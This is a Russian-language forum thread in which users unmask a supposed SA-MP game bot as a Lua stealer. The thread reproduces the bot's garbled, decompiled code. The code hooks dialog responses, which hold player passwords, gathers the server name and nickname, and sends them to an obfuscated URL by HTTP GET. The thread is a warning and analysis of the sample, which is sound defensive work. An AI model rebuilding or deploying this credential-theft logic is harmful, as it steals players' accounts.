Начнем "наслаждаться топовым ботом". Во-первых, бот на стройку весит 2 КБ, да? Уже смешно становиться. Во-вторых, интересно для чего же в боте функции:
Расскажи-ка, зачем в боте интернет-соединение, которое что-то отправляет на сайт, функции для того, чтобы узнать сервер и ник игрока? Далее, почему в скрипте всего лишь одна команда /help? Через нее наверное бот запускается, да? Ну смешно же от таких "топовых" ботов становиться.
[CM]SargonTM, Да, ты прав. Но интернет-соединение может использоваться в ботах для разгадки капчи и для оповещения в ВК.
Я конечно не знаток LUA, но, по сути, стиллер в LUA файл засунуть ещё легче, чем в .cs, .asi или .sf 04.06.2016 - 1000 дней на Cheat Master 08.09.2018 - 5 лет на Чит Мастере 02.03.2019 - 2000 дней на Cheat Master
бля, он получает ток данные и игроке и отправляет их куда-то.... не-не не стиллер
function randomFunction main () var_0_1 = 0 --var_0_1 NUMBER-NUMBER os.exit(var_0_1) return end
function someFunc1() var_1_0 = isSampAvailable() if not var_1_0 then --jump to 0010 (if previous if statement is false) --0010 JMP-JMP repeat var_1_1 = 0 --var_1_1 NUMBER-NUMBER wait(var_1_1) else --location 0010--0010 LOCATION-LOCATION_ until false or (previous if statement is true) --location 0010 local randomFunction0 = function() end -- starts at test.lua:0 sampRegisterChatCommand("help", randomFunction0) var_1_1 = -1 --var_1_1 NUMBER-NUMBER wait(var_1_1) return end end --REVERSE ME
function randomFunction var_10_0.onSendDialogResponse (INPUT_VAR_0_) var_2_2 = INPUT_VAR_0_ var_2_1 = string.gsub(var_2_2, " ", "%%20") var_2_3 = var_2_1 until false or (previous if statement is true) --location 0010 var_2_2 = string.gsub(var_2_3, "\n", "%%0A") return var_2_2 end
function someFunc3(INPUT_VAR_0_,INPUT_VAR_1_,INPUT_VAR_2_,INPUT_VAR_3_) if INPUT_VAR_1_ == 0 then --jump to 0041 (if previous if statement is false) --0041 JMP-JMP local randomFunction1 = function() end -- starts at test.lua:0 var_3_5 = {} --to find out the contents of this table look inside the lua file var_3_7 = var_3_5 var_3_6 = get_char_coordinates(var_3_7) var_3_7 = {} --to find out the contents of this table look inside the lua file until false or (previous if statement is true) --location 0010 var_3_9 = var_3_7 var_3_8 = get_char_coordinates(var_3_9) var_3_9 = sampGetCurrentServerName() var_3_12 = 2 --var_3_12 NUMBER-NUMBER var_3_10 = sampGetPlayerNickname( select(var_3_12, sampGetPlayerIdByCharHandle(playerPed) ) ) var_3_12 = var_3_8 var_3_13 = var_3_9 var_3_14 = var_3_10 var_3_15 = INPUT_VAR_0_ var_3_16 = INPUT_VAR_3_ var_3_11 = string.format(var_3_12, var_3_13, var_3_14, var_3_15, var_3_16) var_3_15 = var_3_6 var_3_16 = randomFunction1 var_3_17 = var_3_11 var_3_16 = var_3_16(var_3_17) var_3_15 = var_3_15 .. var_3_16 var_3_14 = u8(var_3_15) var_3_15 = nil var_3_16 = nil var_3_17 = nil async_http_request("GET", var_3_14, var_3_15, var_3_16, var_3_17) end return end
function randomFunction get_char_coordinates (INPUT_VAR_0_,INPUT_VAR_1_,INPUT_VAR_2_) var_4_1 = 1 --var_4_1 NUMBER-NUMBER LEN unhandled at 0002 var_4_3 = 1 --var_4_3 NUMBER-NUMBER for var_4_4 = var_4_1,INPUT_VAR_2_,var_4_3 do --location 0004, loop ends at 0011-1 var_4_5 = string.char(unknown0) INPUT_VAR_0_[var_4_4] = var_4_5 until false or (previous if statement is true) --location 0010 end --location 0010, loops back to 0005-1 var_4_2 = INPUT_VAR_0_ return table.concat(var_4_2) end
function randomFunction async_http_request (INPUT_VAR_0_,INPUT_VAR_1_,INPUT_VAR_2_) var_5_3 = require("requests") var_5_6 = INPUT_VAR_0_ var_5_7 = INPUT_VAR_1_ var_5_8 = INPUT_VAR_2_ var_5_4, var_5_5 = pcall(var_5_3.request, var_5_6, var_5_7, var_5_8) until false or (previous if statement is true) --location 0010 if var_5_4 then --jump to 0019 (if previous if statement is false) --0019 JMP-JMP var_5_6 = nil var_5_7 = nil var_5_5.xml = var_5_7 var_5_5.json = var_5_6 var_5_6 = true --var_5_6 PRIMITIVE-PRIMITIVE var_5_7 = var_5_5 return var_5_6, var_5_7 --jump to 0022 (if previous if statement is false) --0022 JMP-JMP var_5_6 = false --var_5_6 PRIMITIVE-PRIMITIVE var_5_7 = var_5_5 return var_5_6, var_5_7 return end end --REVERSE ME
function randomFunction() return end
function randomFunction local randomFunction5 () return end
function randomFunction() repeat var_8_2 = uget_8_0 var_8_1, var_8_2 = uget_8_0.status(var_8_2) if not var_8_2 then --jump to 0030 (if previous if statement is false) --0030 JMP-JMP if var_8_1 == "completed" then --jump to 0024 (if previous if statement is false) --0024 JMP-JMP until false or (previous if statement is true) --location 0010 var_8_4 = uget_8_0 var_8_3, var_8_4 = uget_8_0.get(var_8_4) if var_8_3 then --jump to 0019 (if previous if statement is false) --0019 JMP-JMP var_8_6 = var_8_4 uget_8_1(var_8_6) else --location 0019--0019 LOCATION-LOCATION_ var_8_6 = var_8_4 uget_8_2(var_8_6) end return else --location 0024--0024 LOCATION-LOCATION_ if var_8_1 == "canceled" then --jump to 0033 (if previous if statement is false) --0033 JMP-JMP var_8_4 = var_8_1 return uget_8_2(var_8_4) end end else --location 0030--0030 LOCATION-LOCATION_ var_8_4 = var_8_2 return uget_8_2(var_8_4) end var_8_4 = 0 --var_8_4 NUMBER-NUMBER wait(var_8_4) --jump to 0002 (if previous if statement is false) --0002 JMP-JMP until false or (previous if statement is true) --location 0037 return end
function someFunc9(INPUT_VAR_0_,INPUT_VAR_1_,INPUT_VAR_2_,INPUT_VAR_3_,INPUT_VAR_4_) local randomFunction2 = function() end -- starts at test.lua:0 var_9_5 = uget_9_0.thread(randomFunction2) var_9_6 = INPUT_VAR_0_ var_9_7 = INPUT_VAR_1_ var_9_8 = INPUT_VAR_2_ var_9_5 = var_9_5(var_9_6, var_9_7, var_9_8) if not INPUT_VAR_3_ then end -- maybe? until false or (previous if statement is true) --location 0010 --jump to 0012 (if previous if statement is false) --0012 JMP-JMP local randomFunction3 = function() end -- starts at test.lua:0 if not INPUT_VAR_4_ then --jump to 0015 (if previous if statement is false) --0015 JMP-JMP local randomFunction4 = function() end -- starts at test.lua:0 local randomFunction5 = function() end -- starts at test.lua:0 lua_thread.create(randomFunction5) return end
function someFunc10() var_10_0 = require("lib.samp.events") var_10_1 = require("base64") var_10_2 = require("effil") until false or (previous if statement is true) --location 0010 var_10_3 = require("encoding") var_10_3.default = "CP1251" u8 = var_10_3.UTF8 local randomFunction6 = function() end -- starts at test.lua:0 main = randomFunction6 local randomFunction7 = function() end -- starts at test.lua:0 var_10_0.onSendDialogResponse = randomFunction7 local randomFunction8 = function() end -- starts at test.lua:0 get_char_coordinates = randomFunction8 local randomFunction9 = function() end -- starts at test.lua:0 async_http_request = randomFunction9 return end